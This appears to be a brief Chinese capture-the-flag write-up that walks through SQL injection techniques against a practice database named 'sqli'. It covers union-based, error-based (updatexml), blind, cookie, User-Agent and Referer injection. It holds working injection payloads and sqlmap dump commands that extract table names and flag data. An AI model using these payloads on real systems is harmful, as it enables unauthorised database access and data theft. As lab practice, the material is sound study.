整型注入
判断页面是否正常,1=1和1=2是俩个页面
在判断字段数
开始测试回显位置
获得库名
获得库的表
?id=-1 union select 1,table_name from information_schema.tables where table_schema='sqli' --+
获得数据
?id=11 and 1=1 union select 1,concat_ws('>',flag) from flag
字符型注入
查看闭合情况
查看字段数
和整型就一样了,就是多了个闭合
获得库
获得表
?id=-1 union select 1,table_name from information_schema.tables where table_schema='sqli' --+
获得数据
?id=-1' and 1=1 union select 1,concat_ws('>',flag) from flag--+
报错注入
常见报错函数
判断字段数,字段数为2
获得库
?id=-1 and updatexml(1,concat(1,database()),2) --+
获得表
?id=-1 and updatexml(1,(concat(1,(select group_concat(table_name) from information_schema.tables where table_schema ='sqli'))),2)
获得flag
?id=-1 and updatexml(1,(concat(1,(select flag from sqli.flag))),2)
布尔盲注
获取表名flag
sqlmap -u url -D 库名 --tables
获取内容
sqlmap -u url -D sqli -T columns --dump
时间盲注
相关函数
获取数据
sqlmap -u url -D sqli -T flag columns --dump
mysql结构
cookie注入
抓包,查看是那种类型注入,数字型注入
判断字段数和回显位置
获得库名sqli
获取表名zqfiedhdri
获取目标字段rfbtnrfvhc
获得数据
ua注入
和cookie注入一样,就是输入的地方不一样
抓包,发送到intruder,判断什么类型注入
还是整型注入,判断回显位置
获取库名sqli
获取表名fxzppwgkjn
获取字段名spnvpvyyjw
获取数据
refer注入
如果抓包没有refer的话,手动添加referer
判断类型,判断回显,和上面俩个一样,就不多写了,获取库名
获取表名eedqdazyny
获取字段名nekrgdymxv
获取数据